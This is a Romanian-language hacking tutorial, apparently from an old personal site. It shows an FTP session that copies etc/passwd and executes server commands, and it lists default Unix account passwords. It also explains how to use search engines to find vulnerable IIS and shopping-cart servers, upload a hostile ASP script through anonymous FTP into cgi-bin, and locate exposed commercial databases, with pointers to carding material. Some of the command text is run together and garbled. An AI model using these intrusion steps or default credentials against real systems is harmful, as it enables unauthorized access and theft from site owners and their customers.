exemplu:

$bin/bash 'numele shell-ului este bash'


echo "cum te cheama:"
read nume
echo "hello" $nume

Astfel de fisiere pot fi gasite la kilogram pe astalavista.Problema e timpul...

Voi incheia dand alt exemplu de vulnerabilitate al serverelor ftp.

ftp
open ftp.server.com 21
username:guest
password:ftp
you are logged in
ftp>put fis.txt
ftp>quo "cp etc/passwd fis.txt"
ftp>quo "exec ls -l"
ftp>quit

unele servere permit executia de comenzi,am intalnit asa ceva recent iar altele
cand intalnesc o astfel de secventa te deconecteaza imediat.In continuare cateva
parole implicite pentru diferite servicii.Merge la serverele mai vechi.

ACCOUNT PASSWORD
------- --------
root root - nu prea tine figura ;)
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon

Subiect: motoare de cautare


Motoarele de cautare reprezinta dupa parerea mea o sursa nesecata de informatii pentru
oricine nu doar pentru un hacker.O sa enumar cele mai cunoscute motoare de cautare apoi o
sa trec la subiect.www.yahoo.comwww.excite.com
astalavista.box.skwww.gogle.comwww.lycos.com La acestea se mai adauga si motoarele de
pe serverele mari sau de pe anumite portaluri cum ar fi:http://home.ro,
www.kappa.ro,www.xnet.ro,www.top100.ro etc.
Folosind aceste motoare puteti gasi orice informatii doriti tastand numele programului dorit
sau ceva ce este legat de subiectul in cauza.Cum pot fi folosite motoarele de cautare pentru
hack?Simplu.Cu ajutorul lor obtinem o lista de servere dintre care unele pot fi
vulnerabile.Odata am cautat pe excite niste servere dupa un cuvant cheie spre exemplu 'IIS
server'.Am primit o lista de cateva sute de servere dintre care cateva erau vulnerabile.
Majoritatea aveau activat un cont ftp anonim, si se gaseau directoare in care era permisa
executia programelor.Am gasit si servere care dadeau oricui acces la cgi-bin!!Cand gasim un
astfel de server tastam 'dir' pentru a vedea directoarele la care avem acces:open
ftp.server.comconnected to server.com server running aturn..username(server.com):guest
annonymous acces enabled ,send your complete e-mail adress as password
password:mulder@fbi.comyou are logged indirusersetchomecgi-bin !!(ar fi ceva) cd cgi-
binput script_ostil.aspquit
Apoi rulam programul script_ostil.asp si putem obtine acces: www.server.com/cgi-
bin/script_ostil.asp
Evident putem gasi si alte exploituri cum ar fi pentru versiunea de server Proftpdput
..Rezultatul este denial of service.
Prin tatarea de cuvinte cheie ca 'shopping online' 'virtual shop' 'buying' etc putem obtine o
lista de servere comerciale care sunt mai vulnerabile ca celelalte servere datorita
programelor de gestiune a bazelor de date pe care le contin.Cel mai penibil program de
acest tip este cart32.exe localizat in
directoarele cgi-bin sau scripts.Baza de date este administrata cu ajutorul programului
c32web.exe care are o groaza de vulnerabilitati de care prefer sa nu vorbesc pentru ca nu
doresc sub nici un chip sa incalc legea.Acest program cart32 ruleaza sub servere NT.Sub
servere pe Unix este foarte popular programul shop.pl care este la fel de vulnerabil,sau
shopping.cgi.Deseori bazele de date
sunt lasate neprotejate sau cu parola implicita.Am intalnit siteuri care aveau baza de date in
Access care puteau fi incarcate pe calculator!!!
www.sitecomercial.com/_private/database.mbd
Compania britanica Cerberus se ocupa cu tastarea acestor programe,detalii pe
www.packetstorm.securify.com.Apropo www.packetstorm.securify.com are un excelent motor
de cautare.Detalii despre carding,exploituri,siteuri vulnerabile, gasiti tastand 'cart32' 'card'
'cart'.
Folosind programul cgifound.exe va puteti face o idee despre sistemul de operare al gazdei.
Spre exemplu daca in urma scanarii apar directoarele _vti_pvt sau cgi-win atunci inseamna
ca serverul ruleaza sub Windows NT.
Am gasit o groaza de site-uri comerciale vulnerabile dar nu va sfatuiesc sa obtineti acces
deoarece sunteti o tinta sigura.Chiar daca obtineti acces total si puteti edita logfile-ul nu ati
scapat.O sa scriu un tutorial despre cum puteti fi prins si despre cum puteti sa va feriti de
acest lucru.
Cred ca o sa fie cel mai util tutorial pe care o sa-l scriu,deoarece documentatii de hack se
gasesc este tot,dar astfel de documentatii nu prea am vazut.
Un hacker foarte bun 'The Prophet' a fost prins chiar daca a 'lucrat' de la un loc public iar
Mafiaboy cel care a blocat yahoo-ul a fost prins pentru ca a avut gura mare,asa cum e o
persoana care se lauda pe guestbook-ul meu.
Urmatorul tutorial o sa fie despre navigarea anonima pe Net. Credeti ca ati scapat daca
folositi un proxy server?Nicidecum!email : nebunu@home.ro

*Inteleg ca va place ce cititi dar va rog sa mai si votati pentru ca ma simt prost de tot cand
sunt la concurenta cu niste site-uri porno tocmai pe locul 127. *

Daca aveti ceva interesant de semnalat,propuneri sugestii sau critici ,trimiteti un email la
nebunu@home.ro

Va rog mult sa cititi acest articol pana la capat,deoarece valoreaza mult mai mult decat
celelalte dupa parerea mea.